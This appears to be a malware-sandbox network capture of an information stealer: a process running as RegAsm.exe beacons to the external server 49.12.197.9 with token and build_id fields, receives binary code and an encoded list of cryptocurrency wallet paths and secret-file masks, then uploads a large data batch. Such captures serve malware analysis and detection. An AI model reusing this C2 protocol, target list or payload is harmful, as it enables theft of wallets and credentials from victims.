2024-10-02 07:41:59 UTC	16384	IN	Data Raw: 89 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-10-02 07:41:59 UTC	16384	IN	Data Raw: 00 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49790	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:02 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFBGIJKEGIECAAFHDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:02 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HDAFBGIJKEGIECAAFHDHCont
2024-10-02 07:42:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49791	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:03 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:03 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HJJEGIEHIJKKFIDHDGIDCont
2024-10-02 07:42:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:04 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49792	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:05 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:05 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DBKFIDAAEHIEGCBFIDBFCont
2024-10-02 07:42:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:06 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49793	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:06 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:06 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------GHJEGCAEGIIIDHIEBKEBCont
2024-10-02 07:42:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49794	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:09 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 158589 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CFCBFHJECAKEHIECGIEBCont
2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 45 4d 72 78 48 45 69 6f 34 59 6f 66 51 34 36 56 6d 77 32 4f 6f 69 65 30 6d 6e 6b 69 6b 5a 46 6c 6a 63 47 51 35 56 57 4b 34 77 64 6f 33 45 62 65 34 48 31 70 4e 45 30 71 58 54 63 4c 4b 69 6e 5a 48 35 61 79 69 36 6b 66 63 41 66 37 6a 44 43 66 67 54 51 42 73 30 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 48 7a 50 4c 2f 79 46 39 53 2f 36 2b 70 66 2f 41 45 49 30 76 53 6b 6c 2f 77 43 51 76 71 58 2f 41 46 39 53 2f 77 44 6f 52 70 61 2b 33 77 76 38 47 50 6f 66 49 59 6e 2b 4c 4c 31 45 6f 70 61 51 31 30 47 51 55 6c 4b 4b 4b 51 44 65 74 49 61 58 72 52 51 4d 44 53 47 69 6a 46 41 43 48 70 51 61 44 30 6f 50 36 30 44 51 6c 49 4f 66 72 37 30 37 32 78 78 53 47 67 59 6c 4a 30 2f 77 4e 4c 51 65 6c Data Ascii: EMrxHEio4YofQ46Vmw2Ooie0mnkikZFljcGQ5VWK4wdo3Ebe4H1pNE0qXTcLKinZH5ayi6kfcAf7jDCfgTQBs0UUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAHzPL/yF9S/6+pf/AEI0vSkl/wCQvqX/AF9S/wDoRpa+3wv8GPofIYn+LL1EopaQ10GQUlKKKQDetIaXrRQMDSGijFACHpQaD0oP60DQlIOfr7072xxSGgYlJ0/wNLQel
2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 48 45 6b 4b 37 59 31 43 6a 30 46 64 4f 47 77 4d 36 56 5a 31 5a 53 76 76 2b 6e 2b 52 78 59 33 4d 71 64 65 67 71 4d 49 63 74 72 66 68 66 38 41 7a 48 30 55 55 68 72 30 54 79 42 61 54 38 50 31 6f 6f 4e 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 77 6f 6f 6f 46 41 42 53 55 74 4a 51 41 55 55 55 75 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 6a 76 52 51 4d 4b 4b 4b 4b 59 42 53 55 74 42 6f 47 4a 52 52 52 51 41 55 6d 4b 57 69 6d 41 6c 46 46 46 41 42 69 6b 70 61 53 67 59 55 6f 70 4b 4b 41 46 70 4b 4b 4b 41 43 69 69 69 6b 41 6c 46 46 46 4d 41 70 4b 57 69 67 59 6c 46 4b 61 53 67 42 4b 55 55 55 55 77 45 6f 6f 4e 46 41 78 4b 4b 55 30 6c 41 49 4b 58 4e 4a 52 54 47 4f 44 6e 36 30 5a 55 39 56 2f 4b 6d 30 55 41 4c 35 61 6e 37 72 66 6e 54 44 45 77 37 66 6c 54 73 Data Ascii: HEkK7Y1Cj0FdOGwM6VZ1ZSvv+n+RxY3MqdegqMIctrfhf8AzH0UUhr0TyBaT8P1ooNABRRRQAUUUUAFFFFAwoooFABSUtJQAUUUuKAEooooAKSlooASijvRQMKKKKYBSUtBoGJRRRQAUmKWimAlFFFABikpaSgYUopKKAFpKKKACiiikAlFFFMApKWigYlFKaSgBKUUUUwEooNFAxKKU0lAIKXNJRTGODn60ZU9V/Km0UAL5an7rfnTDEw7flTs
2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 63 38 30 47 6d 55 4d 49 2b 61 6a 39 61 64 6a 69 67 6a 69 6e 59 59 77 67 59 70 4d 65 2f 77 43 4e 50 78 78 2b 46 47 4b 4c 49 64 79 50 47 44 30 70 43 4d 31 4a 69 6b 32 35 2f 77 44 31 30 57 48 63 6a 49 7a 54 63 59 46 53 59 2f 4f 67 6a 32 37 30 72 44 75 51 6b 55 33 46 54 45 59 4e 4d 49 70 57 4b 54 47 59 77 61 51 6a 30 70 35 7a 6d 6b 49 4e 4b 78 56 78 6e 53 6a 42 48 74 54 68 2f 6e 4e 47 44 2f 38 41 58 70 32 48 63 62 6a 36 55 59 35 2f 6e 54 73 65 74 49 52 78 52 59 4c 6a 65 67 6f 77 44 54 73 44 6d 6b 50 46 4f 77 37 6a 63 55 6c 50 4e 4e 78 52 59 59 30 69 6a 38 36 64 6a 2f 38 41 58 54 54 31 36 30 72 44 47 30 55 74 46 4b 77 30 4a 6a 4e 4e 2b 6c 4f 49 70 4f 4f 33 65 70 47 4e 34 7a 53 48 6d 6e 45 66 6a 53 66 68 51 55 4e 36 66 34 55 65 2f 53 6c 36 64 71 54 36 56 49 42 Data Ascii: c80GmUMI+aj9adjigjinYYwgYpMe/wCNPxx+FGKLIdyPGD0pCM1Jik25/wD10WHcjIzTcYFSY/Ogj270rDuQkU3FTEYNMIpWKTGYwaQj0p5zmkINKxVxnSjBHtTh/nNGD/8AXp2Hcbj6UY5/nTsetIRxRYLjegowDTsDmkPFOw7jcUlPNNxRYY0ij86dj/8AXTT160rDG0UtFKw0JjNN+lOIpOO3epGN4zSHmnEfjSfhQUN6f4Ue/Sl6dqT6VIB
2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 48 4e 63 33 57 74 6f 66 33 35 76 6f 50 36 31 36 4f 56 50 38 41 32 79 48 7a 2f 4a 6e 42 69 34 57 6f 79 5a 73 30 55 55 56 39 6d 65 47 46 46 46 46 41 48 73 5a 4e 5a 54 6e 2f 41 45 6d 58 2f 66 50 38 36 30 79 61 79 58 50 2b 6b 79 66 37 35 2f 6e 58 34 31 57 65 68 2b 7a 77 52 5a 6a 4e 65 62 61 72 2f 77 41 68 65 39 2f 36 2b 48 2f 39 43 4e 65 6b 52 31 78 48 69 75 32 69 74 39 59 42 69 58 62 35 73 59 6b 66 33 59 6b 67 6e 39 4b 2b 6a 34 54 72 4b 4f 4b 6c 54 66 32 6c 2b 52 38 78 78 58 52 63 73 4c 47 6f 76 73 76 38 7a 44 6f 4e 46 46 66 6f 5a 2b 66 69 55 55 55 55 41 46 64 33 38 4d 50 2b 51 44 71 50 2f 59 52 6b 2f 77 44 51 55 72 68 4b 37 76 34 59 66 38 67 48 55 66 38 41 73 49 79 66 2b 67 70 58 7a 2b 65 2f 38 75 76 56 2f 6b 66 5a 38 4b 66 77 38 54 36 52 2f 4d 36 48 58 66 Data Ascii: HNc3Wtof35voP616OVP8A2yHz/JnBi4WoyZs0UUV9meGFFFFAHsZNZTn/AEmX/fP860yayXP+kyf75/nX41Weh+zwRZjNebar/wAhe9/6+H/9CNekR1xHiu2it9YBiXb5sYkf3Ykgn9K+j4TrKOKlTf2l+R8xxXRcsLGovsv8zDoNFFfoZ+fiUUUUAFd38MP+QDqP/YRk/wDQUrhK7v4Yf8gHUf8AsIyf+gpXz+e/8uvV/kfZ8Kfw8T6R/M6HXf
2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 4e 66 6f 61 7a 62 76 6f 61 30 6d 36 56 6d 33 66 51 31 6c 56 32 4e 36 4f 35 37 52 38 4f 50 2b 52 43 30 7a 2f 74 72 2f 77 43 6a 58 72 71 61 35 62 34 63 66 38 69 46 70 6e 2f 62 58 2f 30 61 39 64 54 58 78 64 54 34 33 36 6e 36 52 52 2f 68 78 39 45 46 46 46 46 51 61 42 52 52 52 51 41 55 55 55 55 41 46 4d 6c 52 70 49 58 52 5a 48 69 5a 6c 49 45 69 41 62 6c 50 71 4d 67 6a 49 39 77 52 54 36 4b 41 4b 65 6d 61 64 46 70 64 6b 4c 61 4f 53 53 55 6c 6d 65 53 61 55 67 76 4b 37 48 4c 4d 32 41 42 6b 6b 39 67 41 4f 67 41 48 46 58 4b 4b 4b 41 43 69 69 69 67 41 71 68 61 36 55 6c 76 71 46 33 66 50 63 54 33 45 39 77 41 6f 61 58 62 2b 36 6a 42 4a 43 49 46 55 66 4c 6b 6b 38 35 4a 7a 79 54 67 59 76 30 55 57 41 70 61 52 70 6b 4f 6a 61 50 61 61 5a 62 4e 49 30 4e 72 45 73 53 4e 49 51 Data Ascii: Nfoazbvoa0m6Vm3fQ1lV2N6O57R8OP+RC0z/tr/wCjXrqa5b4cf8iFpn/bX/0a9dTXxdT436n6RR/hx9EFFFFQaBRRRQAUUUUAFMlRpIXRZHiZlIEiAblPqMgjI9wRT6KAKemadFpdkLaOSSUlmeSaUgvK7HLM2ABkk9gAOgAHFXKKKACiiigAqha6UlvqF3fPcT3E9wAoaXb+6jBJCIFUfLkk85JzyTgYv0UWApaRpkOjaPaaZbNI0NrEsSNIQ
2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 5a 4b 56 68 44 41 48 31 4f 61 73 30 55 56 6f 6b 6b 72 49 79 6c 4a 79 64 32 46 46 46 46 4d 51 6c 46 4c 52 51 41 6c 4a 7a 54 71 4b 59 43 55 63 30 74 46 41 43 55 6e 65 6c 6f 6f 43 34 59 6f 6f 70 44 51 41 55 55 55 55 44 45 6f 6f 6f 6f 41 4b 53 6c 6f 6f 47 4a 52 52 52 51 41 6c 46 4c 52 54 41 53 69 69 69 6b 41 55 55 55 55 44 45 6f 6f 6f 6f 41 54 74 52 53 30 6c 4d 59 6c 46 4c 53 55 44 43 6b 4e 4c 53 55 41 46 46 46 46 4d 59 6c 46 4c 53 55 41 46 4a 53 30 55 44 47 6d 69 6c 6f 6f 41 53 69 6a 76 52 54 41 53 69 6c 6f 4e 41 78 4b 53 6c 70 44 51 41 55 70 70 4b 4f 74 4d 41 6f 4e 46 46 4d 59 6c 4a 54 71 54 38 4b 42 69 55 59 70 61 4b 41 45 78 52 7a 51 61 4b 41 45 6f 70 54 53 55 41 46 4a 53 30 55 78 69 55 55 47 69 6d 41 55 55 55 55 44 44 75 4b 33 62 7a 69 35 2f 34 43 76 38 Data Ascii: ZKVhDAH1Oas0UVokkrIylJyd2FFFFMQlFLRQAlJzTqKYCUc0tFACUnelooC4YoopDQAUUUUDEooooAKSlooGJRRRQAlFLRTASiiikAUUUUDEooooATtRS0lMYlFLSUDCkNLSUAFFFFMYlFLSUAFJS0UDGmilooASijvRTASiloNAxKSlpDQAUppKOtMAoNFFMYlJTqT8KBiUYpaKAExRzQaKAEopTSUAFJS0UxiUUGimAUUUUDDuK3bzi5/4Cv8
2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 74 33 74 76 41 65 6f 49 2b 6c 66 32 61 54 4e 47 66 4a 2b 30 65 64 75 2b 65 50 35 73 2f 70 6a 32 72 67 4b 2b 6b 79 56 2f 75 35 65 70 34 48 45 55 6e 4b 64 4f 54 56 74 50 31 38 30 76 79 43 69 69 69 76 61 50 6e 51 6f 6f 6f 6f 47 46 46 4a 52 51 41 55 55 55 55 77 43 69 69 6b 6f 41 4b 4b 4b 4b 41 43 6b 70 61 53 67 59 55 55 55 55 41 4a 52 52 52 51 41 55 47 69 67 30 44 45 6f 6f 6f 70 67 46 4a 53 30 68 6f 47 46 46 46 46 41 43 55 55 55 55 44 43 6b 70 61 53 67 41 6f 37 55 55 47 67 59 6c 46 46 46 41 43 55 55 55 55 44 45 6f 70 61 53 67 59 55 6c 4c 53 55 41 46 46 46 4a 51 41 55 55 55 6c 41 77 6f 6f 4e 4a 51 41 74 42 70 4b 4b 41 43 69 69 6b 4e 41 77 6f 6f 7a 52 51 4d 53 69 69 69 67 59 68 6f 37 30 55 55 77 45 50 57 69 67 39 61 4b 42 69 55 55 55 55 41 49 61 4b 57 6b 6f 47 Data Ascii: t3tvAeoI+lf2aTNGfJ+0edu+eP5s/pj2rgK+kyV/u5ep4HEUnKdOTVtP180vyCiiivaPnQooooGFFJRQAUUUUwCiikoAKKKKACkpaSgYUUUUAJRRRQAUGig0DEooopgFJS0hoGFFFFACUUUUDCkpaSgAo7UUGgYlFFFACUUUUDEopaSgYUlLSUAFFFJQAUUUlAwooNJQAtBpKKACiikNAwoozRQMSiiigYho70UUwEPWig9aKBiUUUUAIaKWkoG
